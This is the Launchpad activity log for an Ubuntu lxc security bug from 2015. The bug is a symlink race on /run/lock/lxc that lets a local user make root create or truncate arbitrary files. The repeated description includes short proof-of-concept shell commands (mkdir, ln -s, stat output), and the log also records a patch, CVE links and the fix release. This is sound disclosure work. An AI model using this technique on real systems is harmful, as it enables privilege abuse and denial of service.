Ubuntu
lxc package

  1. Bug #1470842
  2. Activity log

Activity log for bug #1470842

Date Who What changed Old value New value Message
2015-07-02 12:46:33 Roman Fiedler bug added bug
2015-07-02 15:16:51 Tyler Hicks bug added subscriber Stéphane Graber
2015-07-02 15:16:59 Tyler Hicks bug added subscriber Serge Hallyn
2015-07-02 15:30:43 Tyler Hicks lxc (Ubuntu): status New Incomplete
2015-07-02 15:35:51 Tyler Hicks lxc (Ubuntu): status Incomplete Confirmed
2015-07-02 15:46:07 Tyler Hicks description When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist. POC: # su -s /bin/bash nobody # mkdir -p lxc/var/lib/lxc # ln -s /etc/suid-debug lxc/var/lib/lxc/somename As root: lxc-info --name somename The guest "somename" has to exist, the method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS # lsb_release -rd Description: Ubuntu 14.04.2 LTS Release: 14.04 # apt-cache policy lxc lxc: Installed: 1.0.7-0ubuntu0.1 Candidate: 1.0.7-0ubuntu0.1 Version table: *** 1.0.7-0ubuntu0.1 0 500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 1.0.3-0ubuntu3 0 500 http://archivexxx/ubuntu/ trusty/main amd64 Packages When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist. Arbitrary file creation PoC: $ mkdir -p /run/lock/lxc/var/lib/lxc $ ln -s /test /run/lock/lxc/var/lib/lxc/somename $ stat /test stat: cannot stat ‘/test’: No such file or directory $ sudo lxc-create --name somename --template download # An admin would run this command ... Distribution: ubuntu Release: trusty Architecture: amd64 ... $ stat /test File: ‘/test’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: fd01h/64769d Inode: 52559 Links: 1 Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2015-07-02 10:40:55.703646793 -0500 Modify: 2015-07-02 10:40:55.703646793 -0500 Change: 2015-07-02 10:40:55.703646793 -0500 Birth: - Arbitrary file truncation PoC: TODO (Roman) The method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS # lsb_release -rd Description: Ubuntu 14.04.2 LTS Release: 14.04 # apt-cache policy lxc lxc:   Installed: 1.0.7-0ubuntu0.1   Candidate: 1.0.7-0ubuntu0.1   Version table:  *** 1.0.7-0ubuntu0.1 0         500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages         100 /var/lib/dpkg/status      1.0.3-0ubuntu3 0         500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
2015-07-02 15:50:45 Marc Deslauriers cve linked 2015-1331
2015-07-02 16:19:29 Tyler Hicks bug added subscriber Ubuntu Security Team
2015-07-02 18:51:18 Tyler Hicks description When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist. Arbitrary file creation PoC: $ mkdir -p /run/lock/lxc/var/lib/lxc $ ln -s /test /run/lock/lxc/var/lib/lxc/somename $ stat /test stat: cannot stat ‘/test’: No such file or directory $ sudo lxc-create --name somename --template download # An admin would run this command ... Distribution: ubuntu Release: trusty Architecture: amd64 ... $ stat /test File: ‘/test’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: fd01h/64769d Inode: 52559 Links: 1 Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2015-07-02 10:40:55.703646793 -0500 Modify: 2015-07-02 10:40:55.703646793 -0500 Change: 2015-07-02 10:40:55.703646793 -0500 Birth: - Arbitrary file truncation PoC: TODO (Roman) The method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS # lsb_release -rd Description: Ubuntu 14.04.2 LTS Release: 14.04 # apt-cache policy lxc lxc:   Installed: 1.0.7-0ubuntu0.1   Candidate: 1.0.7-0ubuntu0.1   Version table:  *** 1.0.7-0ubuntu0.1 0         500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages         100 /var/lib/dpkg/status      1.0.3-0ubuntu3 0         500 http://archivexxx/ubuntu/ trusty/main amd64 Packages When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container. PoC: $ mkdir -p /run/lock/lxc/var/lib/lxc $ ln -s /test /run/lock/lxc/var/lib/lxc/somename $ stat /test stat: cannot stat ‘/test’: No such file or directory $ sudo lxc-create --name somename --template download # An admin would run this command ... Distribution: ubuntu Release: trusty Architecture: amd64 ... $ stat /test   File: ‘/test’   Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: fd01h/64769d Inode: 52559 Links: 1 Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2015-07-02 10:40:55.703646793 -0500 Modify: 2015-07-02 10:40:55.703646793 -0500 Change: 2015-07-02 10:40:55.703646793 -0500  Birth: - # lsb_release -rd Description: Ubuntu 14.04.2 LTS Release: 14.04 # apt-cache policy lxc lxc:   Installed: 1.0.7-0ubuntu0.1   Candidate: 1.0.7-0ubuntu0.1   Version table:  *** 1.0.7-0ubuntu0.1 0         500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages         100 /var/lib/dpkg/status      1.0.3-0ubuntu3 0         500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
2015-07-15 15:58:34 Tyler Hicks attachment added 0001-lxclock-use-run-lxc-lock-rather-than-run-lock-lxc.patch https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1470842/+attachment/4429477/+files/0001-lxclock-use-run-lxc-lock-rather-than-run-lock-lxc.patch
2015-07-22 10:15:14 Roman Fiedler description When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container. PoC: $ mkdir -p /run/lock/lxc/var/lib/lxc $ ln -s /test /run/lock/lxc/var/lib/lxc/somename $ stat /test stat: cannot stat ‘/test’: No such file or directory $ sudo lxc-create --name somename --template download # An admin would run this command ... Distribution: ubuntu Release: trusty Architecture: amd64 ... $ stat /test   File: ‘/test’   Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: fd01h/64769d Inode: 52559 Links: 1 Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2015-07-02 10:40:55.703646793 -0500 Modify: 2015-07-02 10:40:55.703646793 -0500 Change: 2015-07-02 10:40:55.703646793 -0500  Birth: - # lsb_release -rd Description: Ubuntu 14.04.2 LTS Release: 14.04 # apt-cache policy lxc lxc:   Installed: 1.0.7-0ubuntu0.1   Candidate: 1.0.7-0ubuntu0.1   Version table:  *** 1.0.7-0ubuntu0.1 0         500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages         100 /var/lib/dpkg/status      1.0.3-0ubuntu3 0         500 http://archivexxx/ubuntu/ trusty/main amd64 Packages During LXC security analysis (see [1]) it was found, that when lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container or automatic startup starting after boot starting one. PoC: $ mkdir -p /run/lock/lxc/var/lib/lxc $ ln -s /test /run/lock/lxc/var/lib/lxc/somename $ stat /test stat: cannot stat ‘/test’: No such file or directory $ sudo lxc-create --name somename --template download # An admin would run this command ... Distribution: ubuntu Release: trusty Architecture: amd64 ... $ stat /test   File: ‘/test’   Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: fd01h/64769d Inode: 52559 Links: 1 Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2015-07-02 10:40:55.703646793 -0500 Modify: 2015-07-02 10:40:55.703646793 -0500 Change: 2015-07-02 10:40:55.703646793 -0500  Birth: - # lsb_release -rd Description: Ubuntu 14.04.2 LTS Release: 14.04 # apt-cache policy lxc lxc:   Installed: 1.0.7-0ubuntu0.1   Candidate: 1.0.7-0ubuntu0.1   Version table:  *** 1.0.7-0ubuntu0.1 0         500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages         100 /var/lib/dpkg/status      1.0.3-0ubuntu3 0         500 http://archivexxx/ubuntu/ trusty/main amd64 Packages [1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
2015-07-22 14:12:24 Launchpad Janitor lxc (Ubuntu): status Confirmed Fix Released
2015-07-22 14:12:24 Launchpad Janitor cve linked 2015-1131
2015-07-22 14:12:24 Launchpad Janitor cve linked 2015-1334
2015-07-22 14:12:25 Launchpad Janitor lxc (Ubuntu): status Confirmed Fix Released
2015-07-22 14:12:26 Launchpad Janitor lxc (Ubuntu): status Confirmed Fix Released
2015-07-22 14:18:40 Tyler Hicks information type Private Security Public Security
2015-07-22 19:22:23 Tyler Hicks cve unlinked 2015-1131
2015-07-22 19:23:33 Tyler Hicks cve linked 2015-1131
2015-07-22 19:23:54 Tyler Hicks cve unlinked 2015-1334
2015-07-22 19:24:10 Tyler Hicks cve unlinked 2015-1331
2015-07-22 19:24:44 Tyler Hicks cve linked 2015-1331
2015-07-22 19:24:57 Tyler Hicks cve unlinked 2015-1131